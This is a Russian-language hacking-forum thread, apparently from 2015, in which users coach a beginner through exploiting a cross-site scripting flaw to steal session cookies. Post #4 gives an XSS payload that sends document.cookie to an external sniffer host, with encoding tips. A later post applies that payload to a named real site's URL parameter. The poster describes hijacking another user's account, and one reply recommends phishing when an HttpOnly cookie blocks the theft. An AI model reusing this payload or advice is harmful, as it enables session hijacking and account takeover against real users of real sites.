нашол такую хсс

Discussion in 'Песочница' started by Octavian, 16 Aug 2015.

  1. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    #1 Octavian, 16 Aug 2015
  2. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Неудаляите пожалуста тему а то надаело мучятся
     
    #2 Octavian, 16 Aug 2015
  3. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    244
    Reputations:
    2
    У тебя пассивка ищи активку и тогда сможешь запихнуть сниффер...
    Подробнее: тут
     
    #3 hahanovB, 16 Aug 2015
    Last edited: 16 Aug 2015
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    какая разница? JS все равно, разница в том, что пользователю нужно сделать доп. действие.

    такого рода код:
    '+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'
    не забудьте про URLEncode, плюсы в %2b, пробелы в +
     
    _________________________
    #4 yarbabin, 16 Aug 2015
    hahanovB likes this.
  5. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Друг можно всю сылку и чтоб провериная была о то многие типа помоглали но ничево на снифере неприходило,спасибо
     
    #5 Octavian, 16 Aug 2015
  6. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    жутко пишу по русски прошу прощения ето не мои язык
     
    #6 Octavian, 16 Aug 2015
  7. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25

    http://www.torrentsmd.com/smilies_popup.php?text=3&container='+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'&lang=ro

    нехочет так
     
    #7 Octavian, 16 Aug 2015
  8. funny_kaplan

    funny_kaplan New Member

    Joined:
    28 Mar 2013
    Messages:
    43
    Likes Received:
    4
    Reputations:
    0
    #8 funny_kaplan, 16 Aug 2015
  9. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25


    друзя очередная непонятное проблема,спомошю сылке ворую сесию она ворует все значение кроме kogaionon_data а без нео никак
    нехочет пропустить в акаунт даже если остальные значение от акаутнта(1) а значение kogaionon_data ставлю от акаунта(2) меня
    прапускает в акаунт(2),выходит что астальные значение неважно от каково акаунта,и почему kogaionon_data неворуется помогите ето моя первая хсс
    http://incomas.md/shop/2015.jpg
     
    #9 Octavian, 17 Aug 2015
  10. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    друзя очередная непонятное проблема,спомошю сылке ворую сесию она ворует все значение кроме kogaionon_data а без нео никак
    нехочет пропустить в акаунт даже если остальные значение от акаутнта(1) а значение kogaionon_data ставлю от акаунта(2) меня
    прапускает в акаунт(2),выходит что астальные значение неважно от каково акаунта,и почему kogaionon_data неворуется помогите ето моя первая хсс
    http://incomas.md/shop/2015.jpg
     
    #10 Octavian, 17 Aug 2015
  11. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    очередная непонятное проблема,спомошю сылке ворую сесию она ворует все значение кроме kogaionon_data а без нео никак
    нехочет пропустить в акаунт даже если остальные значение от акаутнта(1) а значение kogaionon_data ставлю от акаунта(2) меня
    прапускает в акаунт(2),выходит что астальные значение неважно от каково акаунта,и почему kogaionon_data неворуется помогите ето моя первая хсс
    http://incomas.md/shop/2015.jpg
     
    #11 Octavian, 17 Aug 2015
  12. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    https://www.owasp.org/index.php/HttpOnly
     
    _________________________
    #12 grimnir, 17 Aug 2015
  13. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    #13 Octavian, 17 Aug 2015
  14. funny_kaplan

    funny_kaplan New Member

    Joined:
    28 Mar 2013
    Messages:
    43
    Likes Received:
    4
    Reputations:
    0
    Невозможно получить значение kogaionon_data, потому что javascript не имеет доступа к кукам, которые имеют флаг HttpOnly(передаётся в заголовках браузеру, но JS-ом их не выцепить)
    Юзай фишинг.
     
    #14 funny_kaplan, 17 Aug 2015
    grimnir likes this.
  15. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    nikokovo tolka ot etoi xss? da kakoi normalinii admin povedeotsea na fhising *
     
    #15 Octavian, 17 Aug 2015
  16. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    да дело в HttpOnly ево никак обоити невозможно?
     
    #16 Octavian, 17 Aug 2015
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.